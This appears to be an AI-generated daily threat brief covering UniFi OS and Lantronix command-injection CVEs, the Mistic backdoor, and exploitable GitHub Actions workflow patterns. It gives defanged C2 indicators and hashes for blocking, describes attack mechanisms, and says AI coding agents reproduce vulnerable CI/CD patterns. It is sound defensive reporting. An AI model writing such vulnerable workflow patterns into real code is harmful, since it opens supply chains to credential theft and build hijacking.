Cyber Threat Brief — June 25 2026
⚠️ This report is AI-generated. Always validate findings.
1. Ubiquiti UniFi OS Triple CVSS 10 Chain — CVE-2026-34908 / 34909 / 34910
TL;DR: Three chained UniFi OS vulns (auth bypass + path traversal + command injection) give unauthenticated root RCE on UDM/Cloud Gateway devices. CISA KEV added June 23; federal deadline TOMORROW June 26.
What’s New:
- CISA KEV addition June 23 for all three CVEs with June 26 federal deadline
- CVE-2026-34908: NGINX auth bypass via crafted request prefix resolving to authenticated internal route
- CVE-2026-34909: path traversal to read credentials and config files from underlying OS
- CVE-2026-34910: command injection via shell metacharacters in package name parameter
- ITW exploitation creating rogue admin accounts named “John Sim” — automated recon observed
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| Rogue admin account “John Sim” | Account IOC | T1136.001 | UniFi Controller logs | Hunt |
| NGINX auth-exempt prefix bypass requests | HTTP pattern | T1190 | WAF / reverse proxy | Block |
| Shell metacharacters in package name API param | Exploit pattern | T1059.004 | UniFi OS logs | Detect |
| UniFi OS < 5.0.8 | Vuln version | T1190 | Asset inventory | Patch |
| UDM/UDM-Pro/UDM-SE/Cloud Gateway < 5.1.12 | Vuln version | T1190 | Asset inventory | Patch |
| UniFi Express < 4.0.14 | Vuln version | T1190 | Asset inventory | Patch |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No rule for UniFi OS auth bypass or rogue admin creation |
| Elastic | None | No rule for UniFi OS exploitation |
| Sigma | None | No rule for UniFi OS exploitation |
Sources: CISA KEV Alert · SecurityWeek · BleepingComputer · Ubiquiti SA-064
2. Lantronix EDS5000 Root RCE — CVE-2025-67038
TL;DR: Unauthenticated OS command injection via unsanitized username in HTTP RPC auth logging gives root on serial-to-ethernet OT gateways. CISA KEV June 23; federal deadline TOMORROW June 26.
What’s New:
- CISA KEV addition June 23 with June 26 federal deadline
- HTTP RPC module concatenates username directly into shell command for failed auth logging
- Inject arbitrary OS commands via username parameter — executed as root
- Affects EDS5000 firmware 2.1.0.0R3; fixed in 2.2.0.0R1
- OT/ICS relevance: device manages serial IoT/OT equipment via ethernet
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| HTTP RPC auth endpoint (username param) | Exploit vector | T1190 | Network traffic / IDS | Block external access |
| EDS5000 firmware < 2.2.0.0R1 | Vuln version | T1190 | OT asset inventory | Patch |
| Shell metacharacters in username field | Exploit pattern | T1059.004 | HTTP proxy logs | Detect |
| Root-level process spawned by HTTP RPC service | Post-exploit | T1059.004 | Host logs | Hunt |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No rule for Lantronix EDS exploitation |
| Elastic | None | No rule for Lantronix EDS exploitation |
| Sigma | None | No rule for Lantronix EDS exploitation |
Sources: The Hacker News · CISA ICS Advisory · Security Affairs
3. Mistic Backdoor — KongTuke / Woodgnat IAB
TL;DR: New fileless backdoor from IAB KongTuke (linked to Qilin, Interlock, Rhysida, Akira, 8Base, Black Basta ransomware) sideloads via legitimate Microsoft binary. Symantec published full IOC set June 24.
What’s New:
- Symantec Threat Hunter disclosure June 24 with 9 file hashes and 30 network IOCs
- MpExtMs.exe (legit Microsoft binary) sideloads version.dll loader → loads EndpointDlp.dll (Mistic)
- Fileless: executes payloads in memory, no disk artifact; includes kill switch for self-deletion
- Delivered via ClickFix/CrashFix social engineering on compromised WordPress sites
- Persistence: Run keys masquerading as AnyDesk/Splashtop/Comms, startup shortcuts, scheduled tasks
- Co-deployed with ModeloRAT (WinPython-based RAT with RC4-encrypted C2)
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
| 1e41c7bf…9d1984 (endpointdlp.dll) | SHA-256 | T1574.002 | EDR | Block |
| afd5f1ed…8ca5 (endpointdlp.dll) | SHA-256 | T1574.002 | EDR | Block |
| db972979…7383 (endpointdlp.dll) | SHA-256 | T1574.002 | EDR | Block |
| fb363082…d34a (endpointdlp.dll) | SHA-256 | T1574.002 | EDR | Block |
| 59e3c4cb…b4be (version.dll loader) | SHA-256 | T1574.002 | EDR | Block |
| 34d798a6…07bc (fake lock screen) | SHA-256 | T1056.002 | EDR | Block |
| authorized-logins[.]net | C2 domain | T1071.001 | DNS / proxy | Block |
| updater-worelos[.]com | C2 domain | T1071.001 | DNS / proxy | Block |
| upd-domain-goloro[.]com | C2 domain | T1071.001 | DNS / proxy | Block |
| sql-updater-service[.]com | C2 domain | T1071.001 | DNS / proxy | Block |
| human-check[.]top | C2 domain | T1071.001 | DNS / proxy | Block |
| thomphon[.]com | C2 domain | T1071.001 | DNS / proxy | Block |
| 142.93.242[.]144 | C2 IP | T1071.001 | Firewall | Block |
| 144.31.53[.]78 | C2 IP | T1071.001 | Firewall | Block |
| 198.13.159[.]44 | C2 IP | T1071.001 | Firewall | Block |
| 199.91.221[.]42 | C2 IP | T1071.001 | Firewall | Block |
| MpExtMs.exe loading EndpointDlp.dll | DLL sideload | T1574.002 | Sysmon EID 7 | Hunt |
| Run key: AnyDesk/Splashtop/Comms names | Persistence | T1547.001 | Registry | Hunt |
| pythonw.exe (signed, WinPython) running unknown scripts | ModeloRAT | T1059.006 | EDR | Hunt |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No rule for MpExtMs.exe sideloading or EndpointDlp.dll abuse |
| Elastic | Suspicious DLL Loaded via Side-Loading (generic) | Needs tuning for MpExtMs.exe + EndpointDlp.dll pair |
| Sigma | None | No rule for Mistic/KongTuke sideloading chain |
Sources: Symantec/Broadcom · Zscaler MLTBackdoor · BleepingComputer
4. Cordyceps — Systemic CI/CD Workflow Exploitation
TL;DR: Novee Security disclosed a class of GitHub Actions workflow weaknesses allowing unauthenticated users to hijack builds, steal credentials, and compromise supply chains at 300+ confirmed repos including Microsoft, Google, Apache, and Cloudflare.
What’s New:
- Novee Security disclosure published June 24; 654 repos flagged, 300+ confirmed fully exploitable
- Exploit patterns: command injection in workflow expressions, broken auth logic on PR triggers, artifact poisoning, cross-workflow privilege escalation
- Any free GitHub account can exploit — no org membership required
- AI coding agents reproduce vulnerable CI/CD patterns at scale across millions of repos
- Fixes confirmed at dozens of orgs including Microsoft, Google, Apache, Cloudflare, Python Software Foundation
Actionable Intel
| Artifact | Type | ATT&CK | Log Source | Action |
|---|---|---|---|---|
pull_request_target with actions/checkout@HEAD | Vuln workflow pattern | T1195.002 | GitHub Actions YAML | Audit |
Workflow run: blocks with unsanitized ${{ }} expressions | Command injection | T1059 | GitHub Actions YAML | Audit |
| PRs from forks triggering privileged workflows | Auth bypass | T1078 | GitHub audit log | Alert |
| GITHUB_TOKEN or secrets exposed in workflow logs | Credential leak | T1552.001 | GitHub audit log | Hunt |
Detection
| Source | Rule | Gap |
|---|---|---|
| Splunk ESCU | None | No CI/CD workflow abuse detection |
| Elastic | None | No CI/CD workflow abuse detection |
| Sigma | None | No CI/CD workflow abuse detection |
Sources: Novee Security Blog · The Hacker News · SecurityWeek · Dark Reading
Status Updates
- CVE-2026-20230 (Cisco Unified CM SSRF): Active exploitation confirmed June 21-22 per Defused Cyber; single attacker using file:// payloads for recon file writes. Original brief.
- CVE-2026-50656 (Windows Defender RoguePlanet): Still UNPATCHED zero-day. Microsoft confirmed working on fix since June 16, no timeline. Original brief.
- CVE-2026-20253 (Splunk Enterprise PostgreSQL Sidecar): Federal deadline passed June 21. Active ITW exploitation ongoing. No workarounds — upgrade to 10.4.0/10.2.4/10.0.7. Original brief.